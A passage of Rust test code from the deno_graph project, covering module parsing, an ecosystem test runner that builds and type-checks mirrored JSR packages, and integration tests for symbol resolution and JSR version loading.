import React3 from "https://cdn.skypack.dev/react";
const a = await import("./a.ts");
const React4 = await /* @deno-types="https://deno.land/x/types/react/index.d.ts" */ import("https://cdn.skypack.dev/react");
"#;
let parsed_source = DefaultEsParser
.parse_program(ParseOptions {
specifier: &specifier,
source: source.into(),
media_type: MediaType::Tsx,
scope_analysis: false,
})
.unwrap();
let text_info = parsed_source.text_info_lazy();
let module_info = ParserModuleAnalyzer::module_info(&parsed_source);
let dependencies = module_info.dependencies;
assert_eq!(dependencies.len(), 9);
let ts_references = module_info.ts_references;
assert_eq!(ts_references.len(), 2);
match &ts_references[0] {
TypeScriptReference::Path(specifier) => {
assert_eq!(specifier.text, "./ref.d.ts");
assert_eq!(
text_info.range_text(&specifier.range.as_source_range(text_info)),
r#""./ref.d.ts""#
);
}
TypeScriptReference::Types { .. } => panic!("expected path"),
}
match &ts_references[1] {
TypeScriptReference::Path(_) => panic!("expected types"),
TypeScriptReference::Types {
specifier,
resolution_mode: mode,
} => {
assert_eq!(*mode, None);
assert_eq!(specifier.text, "./types.d.ts");
assert_eq!(
text_info.range_text(&specifier.range.as_source_range(text_info)),
r#""./types.d.ts""#
);
}
}
let dep_deno_types = &dependencies[4]
.as_static()
.unwrap()
.types_specifier
.as_ref()
.unwrap();
assert_eq!(
dep_deno_types.text,
"https://deno.land/x/types/react/index.d.ts"
);
assert_eq!(
text_info.range_text(&dep_deno_types.range.as_source_range(text_info)),
r#""https://deno.land/x/types/react/index.d.ts""#
);
let dep_deno_types = &dependencies[5]
.as_static()
.unwrap()
.types_specifier
.as_ref()
.unwrap();
assert_eq!(
dep_deno_types.text,
"https://deno.land/x/types/react/index.d.ts"
);
assert_eq!(
text_info.range_text(&dep_deno_types.range.as_source_range(text_info)),
r#"https://deno.land/x/types/react/index.d.ts"#
);
assert!(
dependencies[6]
.as_static()
.unwrap()
.types_specifier
.is_none()
);
let dep_deno_types = &dependencies[8]
.as_dynamic()
.unwrap()
.types_specifier
.as_ref()
.unwrap();
assert_eq!(
dep_deno_types.text,
"https://deno.land/x/types/react/index.d.ts"
);
assert_eq!(
text_info.range_text(&dep_deno_types.range.as_source_range(text_info)),
r#""https://deno.land/x/types/react/index.d.ts""#
);
let jsx_import_source = module_info.jsx_import_source.unwrap();
assert_eq!(jsx_import_source.text, "http://example.com/preact");
assert_eq!(
text_info.range_text(&jsx_import_source.range.as_source_range(text_info)),
"http://example.com/preact"
);
let jsx_import_source_types = module_info.jsx_import_source_types.unwrap();
assert_eq!(
jsx_import_source_types.text,
"http://example.com/preactTypes"
);
assert_eq!(
text_info
.range_text(&jsx_import_source_types.range.as_source_range(text_info)),
"http://example.com/preactTypes"
);
assert!(module_info.self_types_specifier.is_none());
}
#[test]
fn test_parse_resolution_mode() {
let specifier =
ModuleSpecifier::parse("file:///a/test.mts").expect("bad specifier");
let source = r#"
/// <reference types="./types.d.ts" resolution-mode="require" />
/// <reference types="node" resolution-mode="import" />
/// <reference types="other" resolution-mode="asdf" />
"#;
let parsed_source = DefaultEsParser
.parse_program(ParseOptions {
specifier: &specifier,
source: source.into(),
media_type: MediaType::Mts,
scope_analysis: false,
})
.unwrap();
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/tests/ecosystem_test.rs | tests/ecosystem_test.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![allow(clippy::disallowed_methods)]
use std::collections::HashSet;
use std::io::Write as _;
use std::path::PathBuf;
use std::sync::Arc;
use deno_ast::MediaType;
use deno_ast::diagnostics::Diagnostic;
use deno_graph::BuildFastCheckTypeGraphOptions;
use deno_graph::BuildOptions;
use deno_graph::GraphKind;
use deno_graph::ModuleGraph;
use deno_graph::WorkspaceFastCheckOption;
use deno_graph::WorkspaceMember;
use deno_graph::ast::CapturingModuleAnalyzer;
use deno_graph::source::LoadResponse;
use deno_graph::source::NullFileSystem;
use deno_semver::StackString;
use deno_semver::package::PackageNv;
use file_test_runner::RunOptions;
use file_test_runner::TestResult;
use file_test_runner::collection::CollectedCategoryOrTest;
use file_test_runner::collection::CollectedTest;
use file_test_runner::collection::strategies::TestPerFileCollectionStrategy;
use futures::FutureExt;
use indexmap::IndexMap;
use serde::Deserialize;
use std::fmt::Write;
use tempfile::tempdir;
use thiserror::Error;
use url::Url;
/// One entry of `jsr_versions.json`: a published JSR package version.
#[derive(Debug, Clone, Deserialize)]
struct Version {
  // JSR scope, without the leading `@`.
  scope: String,
  // Package name within the scope.
  name: String,
  // Exact published version string.
  version: String,
}
/// Test-runner entry point: requires the `ecosystem_test` feature and a
/// populated local JSR mirror, scaffolds missing spec files in UPDATE mode,
/// optionally shards the collected tests, then runs them.
fn main() {
  if cfg!(not(feature = "ecosystem_test")) {
    return;
  }
  // the mirror has to be populated out of band before running
  if std::fs::metadata("./tests/ecosystem/jsr_mirror").is_err() {
    println!(
      "skipping, ecosystem mirror not found. run `deno run -A ./tests/ecosystem/jsr_mirror.ts` to populate"
    );
    return;
  }
  // TODO: Audit that the environment access only happens in single-threaded code.
  unsafe { std::env::set_var("NO_COLOR", "1") };
  let versions_str = include_str!("./ecosystem/jsr_versions.json");
  let versions: Vec<Version> = serde_json::from_str(versions_str).unwrap();
  if std::env::var("UPDATE").as_deref() == Ok("1") {
    // scaffold a spec file for any version that lacks one; `create_new`
    // fails harmlessly when the file already exists
    for version in versions {
      let path = PathBuf::from(format!(
        "./tests/specs/ecosystem/{}/{}/{}.test",
        version.scope.replace('-', "_"),
        version.name.replace('-', "_"),
        version.version.replace(['.', '-', '+'], "_")
      ));
      std::fs::create_dir_all(path.parent().unwrap()).ok();
      if let Ok(mut file) = std::fs::OpenOptions::new()
        .create_new(true)
        .write(true)
        .open(path)
      {
        file
          .write_all(
            format!(
              "{}/{}/{}\n-- deno.lock --\n{{}}\n===\n\n",
              version.scope, version.name, version.version
            )
            .as_bytes(),
          )
          .unwrap();
      }
    }
  }
  let mut category = file_test_runner::collection::collect_tests_or_exit(
    file_test_runner::collection::CollectOptions {
      base: PathBuf::from("./tests/specs/ecosystem"),
      strategy: Box::new(TestPerFileCollectionStrategy {
        file_pattern: Some(".*\\.test$".to_owned()),
      }),
      filter_override: None,
    },
  );
  // optional CI sharding via SHARD_INDEX/SHARD_COUNT: keep only the
  // package categories that fall into this shard's slice
  let shard_index: Option<u8> = std::env::var("SHARD_INDEX")
    .ok()
    .map(|s| s.parse().unwrap());
  let shard_count: Option<u8> = std::env::var("SHARD_COUNT")
    .ok()
    .map(|s| s.parse().unwrap());
  if let (Some(shard_index), Some(shard_count)) = (shard_index, shard_count) {
    let tests_per_shard = category.test_count() / shard_count as usize;
    let mut current_shard_index = 0;
    let mut tests_in_current_shard = 0;
    category.children.retain_mut(|category| match category {
      CollectedCategoryOrTest::Test(_) => todo!(),
      CollectedCategoryOrTest::Category(category) => {
        category.children.retain(|category| match category {
          CollectedCategoryOrTest::Test(_) => todo!(),
          CollectedCategoryOrTest::Category(category) => {
            let test_count = category.test_count();
            tests_in_current_shard += test_count;
            let retain = current_shard_index == shard_index;
            if tests_in_current_shard > tests_per_shard {
              current_shard_index += 1;
              tests_in_current_shard = 0;
            }
            retain
          }
        });
        !category.children.is_empty()
      }
    });
  };
  file_test_runner::run_tests(
    &category,
    RunOptions {
      // run serially on CI for more predictable behavior
      parallel: std::env::var("CI").is_err(),
    },
    run_test,
  )
}
/// Parses one `.test` spec file — first line `scope/name/version`, then a
/// `-- deno.lock --` section, then the expected output after `===` — and
/// runs that package version against it.
fn run_test(test: &CollectedTest) -> TestResult {
  TestResult::from_maybe_panic(|| {
    let file = test.read_to_string().unwrap();
    let Some((scope_name_version, rest)) = file.split_once('\n') else {
      panic!("first line of test file must be scope/name/version");
    };
    let (scope, name_version) = scope_name_version.split_once('/').unwrap();
    let (name, version) = name_version.split_once('/').unwrap();
    let (lockfile_with_prefix, expected) =
      rest.split_once("\n===\n\n").unwrap();
    let lockfile = lockfile_with_prefix
      .strip_prefix("-- deno.lock --\n")
      .unwrap();
    test_version(scope, name, version, &test.path, lockfile, expected)
  })
}
/// Subset of a JSR `<version>_meta.json` file used by this test.
#[derive(Debug, Clone, Deserialize)]
struct VersionMeta {
  // Map of export name -> module path within the package.
  exports: IndexMap<String, String>,
}
/// Error returned by the loader for URL schemes it does not handle.
#[derive(Debug, Clone, Deserialize, Error, deno_error::JsError)]
#[class(type)]
#[error("Unsupported scheme: {0}")]
struct UnsupportedScheme(String);
/// `deno_graph` loader that serves modules for a single package version
/// from the on-disk JSR mirror instead of the network.
struct Loader<'a> {
  scope: &'a str,
  name: &'a str,
  version: &'a str,
}
impl deno_graph::source::Loader for Loader<'_> {
  /// Resolves `file:` specifiers against the mirrored package directory,
  /// decodes `data:` URLs inline, and reports `jsr:`/`npm:`/`node:`
  /// specifiers as external. Any other scheme is an error.
  fn load(
    &self,
    specifier: &deno_ast::ModuleSpecifier,
    _options: deno_graph::source::LoadOptions,
  ) -> deno_graph::source::LoadFuture {
    let res = match specifier.scheme() {
      "file" => {
        // map file:///<path> onto the mirror's package directory
        let specifier_str = specifier.to_string();
        let specifier_str = specifier_str.trim_start_matches("file:///");
        let path = format!(
          "./tests/ecosystem/jsr_mirror/{}/{}/{}/{}",
          self.scope, self.name, self.version, specifier_str
        );
        match std::fs::read_to_string(path) {
          Ok(source_code) => Ok(Some(LoadResponse::Module {
            content: source_code.into_bytes().into(),
            maybe_headers: None,
            mtime: None,
            specifier: specifier.clone(),
          })),
          // a missing file simply means the module does not exist
          Err(err) if err.kind() == std::io::ErrorKind::NotFound => Ok(None),
          Err(err) => Err(deno_graph::source::LoadError::Other(
            std::sync::Arc::new(err),
          )),
        }
      }
      "data" => deno_graph::source::load_data_url(specifier)
        .map_err(|e| deno_graph::source::LoadError::Other(Arc::new(e))),
      "jsr" | "npm" | "node" => Ok(Some(LoadResponse::External {
        specifier: specifier.clone(),
      })),
      _ => Err(deno_graph::source::LoadError::Other(Arc::new(
        UnsupportedScheme(specifier.scheme().to_string()),
      ))),
    };
    async move { res }.boxed()
  }
}
/// `JsrUrlProvider` used with `passthrough_jsr_specifiers: true`; its URL
/// methods are not expected to be called.
struct PassthroughJsrUrlProvider;
impl deno_graph::source::JsrUrlProvider for PassthroughJsrUrlProvider {
  fn url(&self) -> &Url {
    unreachable!(
      "BuildOptions::passthrough_jsr_specifiers should be set to true"
    )
  }
  fn package_url(&self, _nv: &PackageNv) -> Url {
    unreachable!(
      "BuildOptions::passthrough_jsr_specifiers should be set to true"
    )
  }
  // `None`: no URL maps back to a JSR package in passthrough mode.
  fn package_url_to_nv(&self, _url: &Url) -> Option<PackageNv> {
    None
  }
}
use std::path::Path;
use std::{fs, io};
/// Recursively copies the directory tree at `src` into `dst`, creating
/// `dst` (and any missing parents) first. Files are copied directly;
/// subdirectories are handled by recursion.
fn copy_dir_all(
  src: impl AsRef<Path>,
  dst: impl AsRef<Path>,
) -> io::Result<()> {
  let dst = dst.as_ref();
  fs::create_dir_all(dst)?;
  for dir_entry in fs::read_dir(src)? {
    let dir_entry = dir_entry?;
    let target = dst.join(dir_entry.file_name());
    if dir_entry.file_type()?.is_dir() {
      copy_dir_all(dir_entry.path(), target)?;
    } else {
      fs::copy(dir_entry.path(), target)?;
    }
  }
  Ok(())
}
/// Builds the module graph for one mirrored package version, runs fast
/// check over its exports, and — when fast check emits cleanly — copies
/// the package into a temp dir, swaps in the fast-check output, and type
/// checks it with the `deno` CLI. The collected output and lockfile are
/// compared against the spec (or written back in UPDATE mode).
#[tokio::main(flavor = "current_thread")]
async fn test_version(
  scope: &str,
  name: &str,
  version: &str,
  spec_path: &Path,
  lockfile: &str,
  expected: &str,
) {
  let version_meta_path =
    format!("./tests/ecosystem/jsr_mirror/{scope}/{name}/{version}_meta.json");
  let version_meta_str = std::fs::read_to_string(version_meta_path).unwrap();
  let version_meta: VersionMeta =
    serde_json::from_str(&version_meta_str).unwrap();
  let module_analyzer = CapturingModuleAnalyzer::default();
  let mut graph = ModuleGraph::new(GraphKind::All);
  // the package under test is modeled as a single-member workspace
  let workspace_members = vec![WorkspaceMember {
    base: Url::parse("file:///").unwrap(),
    exports: version_meta.exports.clone(),
    name: StackString::from_string(format!("@{scope}/{name}")),
    version: Some(deno_semver::Version::parse_standard(version).unwrap()),
  }];
  // every export of the package becomes a graph root
  let mut roots = vec![];
  for (_, specifier) in &version_meta.exports {
    let url = Url::parse(&format!("file:///{specifier}")).unwrap();
    roots.push(url);
  }
  let loader = Loader {
    scope,
    name,
    version,
  };
  graph
    .build(
      roots.clone(),
      Vec::new(),
      &loader,
      BuildOptions {
        is_dynamic: false,
        skip_dynamic_deps: false,
        unstable_bytes_imports: false,
        unstable_text_imports: false,
        module_analyzer: &module_analyzer,
        module_info_cacher: Default::default(),
        file_system: &NullFileSystem,
        locker: None,
        resolver: None,
        npm_resolver: None,
        reporter: None,
        jsr_version_resolver: Default::default(),
        jsr_url_provider: &PassthroughJsrUrlProvider,
        passthrough_jsr_specifiers: true,
        executor: Default::default(),
        jsr_metadata_store: None,
      },
    )
    .await;
  if let Err(err) = graph.valid() {
    match err {
      deno_graph::ModuleGraphError::ModuleError(err) => {
        match err.as_kind() {
          deno_graph::ModuleErrorKind::UnsupportedMediaType {
            media_type: MediaType::Cjs | MediaType::Cts,
            ..
          } => {
            // ignore, old packages with cjs and cts
            return;
          }
          err => panic!("{}", err),
        }
      }
      err => panic!("{}", err),
    }
  }
  graph.build_fast_check_type_graph(BuildFastCheckTypeGraphOptions {
    fast_check_cache: Default::default(),
    fast_check_dts: true,
    jsr_url_provider: &PassthroughJsrUrlProvider,
    es_parser: Some(&module_analyzer),
    resolver: None,
    workspace_fast_check: WorkspaceFastCheckOption::Enabled(&workspace_members),
  });
  // collect fast-check diagnostics across all roots, de-duplicated by range
  let mut fast_check_diagnostic_ranges = HashSet::new();
  let mut fast_check_diagnostics = vec![];
  for root in &roots {
    let module = graph.get(root).unwrap();
    if let Some(module) = module.js()
      && let Some(diagnostics) = module.fast_check_diagnostics()
    {
      for diagnostic in diagnostics {
        if fast_check_diagnostic_ranges.insert(diagnostic.range()) {
          fast_check_diagnostics.push(diagnostic.clone());
        }
      }
    }
  }
  let mut output = if fast_check_diagnostics.is_empty() {
    "== FAST CHECK EMIT PASSED ==\n".to_owned()
  } else {
    let mut output = "== FAST CHECK EMIT FAILED ==\n".to_owned();
    for diagnostic in &fast_check_diagnostics {
      writeln!(&mut output, "{}\n", diagnostic.display()).unwrap();
    }
    output
  };
  let mut new_lockfile = lockfile.to_string();
  if fast_check_diagnostics.is_empty() {
    // fast check emitted: copy the package into a temp dir, overwrite
    // modules with their fast-check sources, and type check with `deno`
    let tmpdir = tempdir().unwrap();
    let tmpdir_path = tmpdir.path().canonicalize().unwrap();
    // strip Windows' verbatim `\\?\` prefix so paths stay comparable
    let tmpdir_path = if cfg!(windows) {
      PathBuf::from(
        tmpdir_path
          .to_str()
          .unwrap()
          .strip_prefix("\\\\?\\")
          .unwrap(),
      )
    } else {
      tmpdir_path
    };
    let temp_file =
      std::env::temp_dir().join(format!("{}_{}_{}.lock", scope, name, version));
    std::fs::write(&temp_file, lockfile.trim()).unwrap();
    let lockfile_path = temp_file.canonicalize().unwrap();
    let base_path =
      format!("./tests/ecosystem/jsr_mirror/{scope}/{name}/{version}");
    copy_dir_all(base_path, &tmpdir_path).unwrap();
    for module in graph.modules() {
      if module.specifier().scheme() != "file" {
        continue;
      }
      if let Some(module) = module.js()
        && let Some(fcm) = module.fast_check_module()
      {
        let path =
          format!("{}{}", tmpdir_path.display(), module.specifier.path());
        std::fs::write(&path, fcm.source.as_bytes()).unwrap();
      }
    }
    let tmpdir_path_str = tmpdir_path.to_string_lossy().to_string();
    let tmpdir_specifier = Url::from_directory_path(&tmpdir_path).unwrap();
    let tmpdir_specifier_path =
      tmpdir_specifier.path().strip_suffix('/').unwrap();
    let mut cmd = std::process::Command::new("deno");
    cmd
      .arg("check")
      .arg(format!("--lock={}", lockfile_path.display()))
      .arg("--no-config")
      .env("DENO_NO_PACKAGE_JSON", "true")
      .env("NO_COLOR", "true")
      .env("RUST_LIB_BACKTRACE", "0")
      .current_dir(&tmpdir_path);
    if std::env::var("UPDATE_LOCKFILE").as_deref() == Ok("1") {
      cmd.arg("--lock-write");
    }
    let deno_out = cmd
      .args(roots.iter().map(|root| format!(".{}", root.path())))
      .output()
      .unwrap();
    if deno_out.status.success() {
      writeln!(&mut output, "\n== TYPE CHECK PASSED ==").unwrap();
    } else {
      writeln!(&mut output, "\n== TYPE CHECK FAILED ==").unwrap();
      // normalize the CLI output: strip progress lines and replace
      // machine-specific paths with stable placeholders
      let initialize_regexp =
        regex::Regex::new(r"(:?Initialize|Download|Check) [^\n]*\n").unwrap();
      let node_modules_dir_regexp =
        regex::Regex::new(r"([A-Z]:\/|\/)[^\s\n]*\/registry\.npmjs\.org")
          .unwrap();
      let stdout = String::from_utf8_lossy(&deno_out.stdout)
        .replace(tmpdir_specifier_path, "<tmpdir>")
        .replace(&tmpdir_path_str, "<tmpdir>")
        .replace('\\', "/");
      let stdout = initialize_regexp.replace_all(&stdout, "");
      let stdout =
        node_modules_dir_regexp.replace_all(&stdout, "<global_npm_dir>");
      let stderr = String::from_utf8_lossy(&deno_out.stderr)
        .replace(tmpdir_specifier_path, "<tmpdir>")
        .replace(&tmpdir_path_str, "<tmpdir>")
        .replace('\\', "/");
      let stderr = initialize_regexp.replace_all(&stderr, "");
      let stderr =
        node_modules_dir_regexp.replace_all(&stderr, "<global_npm_dir>");
      writeln!(&mut output, "-- stdout --\n{}", stdout).unwrap();
      writeln!(&mut output, "-- stderr --\n{}", stderr).unwrap();
    }
    new_lockfile = std::fs::read_to_string(&lockfile_path).unwrap();
    if !new_lockfile.ends_with('\n') {
      new_lockfile.push('\n');
    };
    // DONT_CLEAN keeps the temp dir around for debugging
    if std::env::var("DONT_CLEAN").is_ok() {
      println!("leaving tempdir: {}", tmpdir_path.display());
      Box::leak(Box::new(tmpdir));
    } else {
      std::fs::remove_file(lockfile_path).unwrap();
    }
  }
  if std::env::var("UPDATE").as_deref() == Ok("1") {
    // update mode: rewrite the spec file with the actual output
    std::fs::write(
      spec_path,
      format!(
        "{scope}/{name}/{version}\n-- deno.lock --\n{}\n===\n\n{}",
        new_lockfile, output
      ),
    )
    .unwrap();
  } else {
    let lockfile_expected = lockfile.trim_end();
    let new_lockfile = new_lockfile.trim_end();
    pretty_assertions::assert_eq!(
      new_lockfile,
      lockfile_expected,
      "lockfile did not match, run `UPDATE=1 cargo test --test ecosystem` to update"
    );
    let expected = expected.trim_end();
    let output = output.trim_end();
    pretty_assertions::assert_eq!(output, expected);
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/tests/integration_test.rs | tests/integration_test.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![allow(clippy::disallowed_methods)]
// todo(dsherret): move the integration-like tests to this file because it
// helps ensure we're testing the public API and ensures we export types
// out of deno_graph that should be public
use std::cell::RefCell;
use deno_ast::ModuleSpecifier;
use deno_error::JsErrorBox;
use deno_graph::BuildOptions;
use deno_graph::FillFromLockfileOptions;
use deno_graph::GraphKind;
use deno_graph::ModuleGraph;
use deno_graph::NpmResolvePkgReqsResult;
use deno_graph::Range;
use deno_graph::packages::JsrPackageInfo;
use deno_graph::packages::JsrPackageInfoVersion;
use deno_graph::packages::JsrPackageVersionInfo;
use deno_graph::source::CacheSetting;
use deno_graph::source::ChecksumIntegrityError;
use deno_graph::source::LoadError;
use deno_graph::source::LoadFuture;
use deno_graph::source::LoadOptions;
use deno_graph::source::LoadResponse;
use deno_graph::source::MemoryLoader;
use deno_graph::source::NpmResolver;
use deno_graph::source::ResolutionKind;
use deno_graph::source::ResolveError;
use deno_semver::jsr::JsrDepPackageReq;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use indexmap::IndexSet;
use pretty_assertions::assert_eq;
use serde_json::json;
use sys_traits::FsCreateDirAll;
use sys_traits::FsWrite;
use sys_traits::impls::InMemorySys;
use url::Url;
use crate::helpers::TestBuilder;
use self::helpers::TestNpmResolver;
mod helpers;
#[cfg(feature = "symbols")]
#[tokio::test]
async fn test_symbols_dep_definition() {
  use deno_graph::symbols::ResolvedSymbolDepEntry;

  // A module exposing several type-level references to the same class
  // (direct `typeof`, static property access, index access, and
  // `.prototype` access) so we can check where each symbol dep resolves.
  // NOTE: the fixture is flush-left on purpose — the expected definition
  // text below depends on the exact source bytes of the class declaration.
  let result = TestBuilder::new()
    .with_loader(|loader| {
      loader.remote.add_source_with_text(
        "file:///mod.ts",
        r#"
export type MyType = typeof MyClass;
export type MyTypeProp = typeof MyClass.staticProp;
export type MyTypeIndexAccess = typeof MyClass["staticProp"];
export type PrototypeAccess = typeof MyClass.prototype.instanceProp;
export class MyClass {
  instanceProp: string = "";
  static staticProp: string = "";
}
"#,
      );
    })
    .build()
    .await;
  let root_symbol = result.root_symbol();
  let module = root_symbol
    .module_from_specifier(&ModuleSpecifier::parse("file:///mod.ts").unwrap())
    .unwrap();
  let exports = module.exports(&root_symbol);
  // Resolves the named export, asserts it has exactly one symbol dep, then
  // resolves that dep to a single definition and returns that definition's
  // source text.
  let resolve_single_definition_text = |name: &str| -> String {
    let resolved_type = exports.resolved.get(name).unwrap();
    let resolved_type = resolved_type.as_resolved_export();
    let type_symbol = resolved_type.symbol();
    // collect the symbol deps across all declarations of the symbol
    let deps = type_symbol
      .decls()
      .iter()
      .filter_map(|d| d.maybe_node())
      .flat_map(|s| {
        s.deps(deno_graph::symbols::ResolveDepsMode::TypesAndExpressions)
      })
      .collect::<Vec<_>>();
    assert_eq!(deps.len(), 1);
    let mut resolved_deps =
      root_symbol.resolve_symbol_dep(resolved_type.module, &deps[0]);
    assert_eq!(resolved_deps.len(), 1);
    let resolved_dep = resolved_deps.remove(0);
    // these fixtures never resolve to an `import type`, only to a path
    let path = match resolved_dep {
      ResolvedSymbolDepEntry::Path(p) => p,
      ResolvedSymbolDepEntry::ImportType(_) => unreachable!(),
    };
    let definitions = path.into_definitions().collect::<Vec<_>>();
    assert_eq!(definitions.len(), 1);
    let definition = &definitions[0];
    definition.text().to_string()
  };
  let class_text = "export class MyClass {\n  instanceProp: string = \"\";\n  static staticProp: string = \"\";\n}";
  assert_eq!(resolve_single_definition_text("MyType"), class_text);
  assert_eq!(
    resolve_single_definition_text("MyTypeProp"),
    "static staticProp: string = \"\";"
  );
  assert_eq!(
    resolve_single_definition_text("MyTypeIndexAccess"),
    // good enough for now
    class_text
  );
  assert_eq!(
    resolve_single_definition_text("PrototypeAccess"),
    // good enough for now
    class_text
  );
}
#[cfg(feature = "symbols")]
#[tokio::test]
async fn test_symbols_re_export_external_and_npm() {
  // A module that star re-exports from an npm specifier and an external
  // specifier; both should surface as unresolved specifiers on the exports.
  // (The second string literal in the fixture is left unterminated, matching
  // what this test has always fed the parser.)
  let built = TestBuilder::new()
    .with_loader(|loader| {
      loader.remote.add_source_with_text(
        "file:///mod.ts",
        r#"export * from 'npm:example@1.0.0'; export * from 'external:other"#,
      );
      loader.remote.add_external_source("external:other");
    })
    .build()
    .await;
  let root_symbol = built.root_symbol();
  let mod_specifier = ModuleSpecifier::parse("file:///mod.ts").unwrap();
  let module = root_symbol.module_from_specifier(&mod_specifier).unwrap();
  let exports = module.exports(&root_symbol);
  let unresolved: Vec<_> = exports
    .unresolved_specifiers
    .into_iter()
    .map(|s| s.specifier)
    .collect();
  // both re-export targets, in source order
  assert_eq!(unresolved, vec!["npm:example@1.0.0", "external:other"]);
}
#[tokio::test]
async fn test_jsr_version_not_found_then_found() {
  // Loader that records every (specifier, cache setting) request it
  // receives. Its package meta.json response omits version 1.2.0 unless the
  // request uses `CacheSetting::Reload`, simulating a stale local registry
  // cache that only learns about the requested version after a forced
  // refresh. The assertions below pin the exact request order and cache
  // settings the builder uses in that situation.
  #[derive(Default)]
  struct TestLoader {
    requests: RefCell<Vec<(String, CacheSetting)>>,
  }
  impl deno_graph::source::Loader for TestLoader {
    fn load(
      &self,
      specifier: &ModuleSpecifier,
      options: LoadOptions,
    ) -> LoadFuture {
      assert!(!options.in_dynamic_branch);
      // record the request so the test can assert on order + cache settings
      self
        .requests
        .borrow_mut()
        .push((specifier.to_string(), options.cache_setting));
      let specifier = specifier.clone();
      match specifier.as_str() {
        // root module importing jsr:@scope/a@1.2 (the import string in the
        // fixture is unterminated; the parser still records the import)
        "file:///main.ts" => Box::pin(async move {
          Ok(Some(LoadResponse::Module {
            specifier: specifier.clone(),
            maybe_headers: None,
            mtime: None,
            content: b"import 'jsr:@scope/a@1.2".to_vec().into(),
          }))
        }),
        // a root with no dependencies, used to force an initial build
        "file:///empty.ts" => Box::pin(async move {
          Ok(Some(LoadResponse::Module {
            specifier: specifier.clone(),
            maybe_headers: None,
            mtime: None,
            content: Default::default(),
          }))
        }),
        "https://jsr.io/@scope/a/meta.json" => {
          Box::pin(async move {
            Ok(Some(LoadResponse::Module {
              specifier: specifier.clone(),
              maybe_headers: None,
              mtime: None,
              content: match options.cache_setting {
                CacheSetting::Only | CacheSetting::Use => {
                  // first time it won't have the version
                  br#"{ "versions": { "1.0.0": {} } }"#.to_vec().into()
                }
                CacheSetting::Reload => {
                  // then on reload it will
                  br#"{ "versions": { "1.0.0": {}, "1.2.0": {} } }"#.to_vec().into()
                }
              },
            }))
          })
        }
        // version metadata for the newly-discovered 1.2.0 release
        "https://jsr.io/@scope/a/1.2.0_meta.json" => Box::pin(async move {
          Ok(Some(LoadResponse::Module {
            specifier: specifier.clone(),
            maybe_headers: None,
            mtime: None,
            content: br#"{
  "exports": { ".": "./mod.ts" },
  "manifest": {
    "/mod.ts": {
      "size": 123,
      "checksum": "sha256-b8059cfb1ea623e79efbf432db31595df213c99c6534c58bec9d5f5e069344df"
    }
  }
}"#
            .to_vec()
            .into(),
          }))
        }),
        "https://jsr.io/@scope/a/1.2.0/mod.ts" => Box::pin(async move {
          Ok(Some(LoadResponse::Module {
            specifier: specifier.clone(),
            maybe_headers: None,
            mtime: None,
            content: b"console.log('Hello, world!')".to_vec().into(),
          }))
        }),
        _ => unreachable!(),
      }
    }
  }
  {
    // Scenario 1: fresh graph — the builder retries main.ts and reloads the
    // package meta.json after the first (cached) lookup misses 1.2.
    let loader = TestLoader::default();
    let mut graph = ModuleGraph::new(GraphKind::All);
    graph
      .build(
        vec![Url::parse("file:///main.ts").unwrap()],
        Vec::new(),
        &loader,
        Default::default(),
      )
      .await;
    graph.valid().unwrap();
    assert_eq!(
      *loader.requests.borrow(),
      vec![
        ("file:///main.ts".to_string(), CacheSetting::Use),
        (
          "https://jsr.io/@scope/a/meta.json".to_string(),
          CacheSetting::Use
        ),
        ("file:///main.ts".to_string(), CacheSetting::Use),
        (
          "https://jsr.io/@scope/a/meta.json".to_string(),
          CacheSetting::Reload
        ),
        (
          "https://jsr.io/@scope/a/1.2.0_meta.json".to_string(),
          CacheSetting::Reload
        ),
        (
          "https://jsr.io/@scope/a/1.2.0/mod.ts".to_string(),
          CacheSetting::Use
        ),
      ]
    );
  }
  {
    // Scenario 2: the graph has already been built once, so only specific
    // meta files are reloaded (no full restart / no re-request of main.ts).
    let loader = TestLoader::default();
    let mut graph = ModuleGraph::new(GraphKind::All);
    // do an initial build
    graph
      .build(
        vec![Url::parse("file:///empty.ts").unwrap()],
        Vec::new(),
        &loader,
        Default::default(),
      )
      .await;
    graph.valid().unwrap();
    // full restart won't be supported at this point because
    // a build previously happened, so it will only reload
    // specific meta files
    graph
      .build(
        vec![Url::parse("file:///main.ts").unwrap()],
        Vec::new(),
        &loader,
        Default::default(),
      )
      .await;
    graph.valid().unwrap();
    assert_eq!(
      *loader.requests.borrow(),
      vec![
        ("file:///empty.ts".to_string(), CacheSetting::Use),
        ("file:///main.ts".to_string(), CacheSetting::Use),
        (
          "https://jsr.io/@scope/a/meta.json".to_string(),
          CacheSetting::Use
        ),
        (
          "https://jsr.io/@scope/a/meta.json".to_string(),
          CacheSetting::Reload
        ),
        (
          "https://jsr.io/@scope/a/1.2.0_meta.json".to_string(),
          CacheSetting::Use
        ),
        (
          "https://jsr.io/@scope/a/1.2.0/mod.ts".to_string(),
          CacheSetting::Use
        ),
      ]
    );
  }
}
#[tokio::test]
async fn test_jsr_wasm_module() {
  // Builds a graph for a JSR package whose only export is a Wasm module and
  // checks that the build completes and validates.
  struct TestLoader;
  impl deno_graph::source::Loader for TestLoader {
    fn load(
      &self,
      specifier: &ModuleSpecifier,
      options: LoadOptions,
    ) -> LoadFuture {
      assert!(!options.in_dynamic_branch);
      let specifier = specifier.clone();
      match specifier.as_str() {
        // root module importing the jsr package (unterminated import string
        // in the fixture; the parser still records the import)
        "file:///main.ts" => Box::pin(async move {
          Ok(Some(LoadResponse::Module {
            specifier: specifier.clone(),
            maybe_headers: None,
            mtime: None,
            content: b"import 'jsr:@scope/a@1".to_vec().into(),
          }))
        }),
        // package metadata listing available versions
        "https://jsr.io/@scope/a/meta.json" => Box::pin(async move {
          Ok(Some(LoadResponse::Module {
            specifier: specifier.clone(),
            maybe_headers: None,
            mtime: None,
            content: br#"{ "versions": { "1.0.0": {} } }"#.to_vec().into(),
          }))
        }),
        // version metadata: the default export is a .wasm file; the package's
        // "moduleGraph2" declares it has no dependencies
        "https://jsr.io/@scope/a/1.0.0_meta.json" => Box::pin(async move {
          Ok(Some(LoadResponse::Module {
            specifier: specifier.clone(),
            maybe_headers: None,
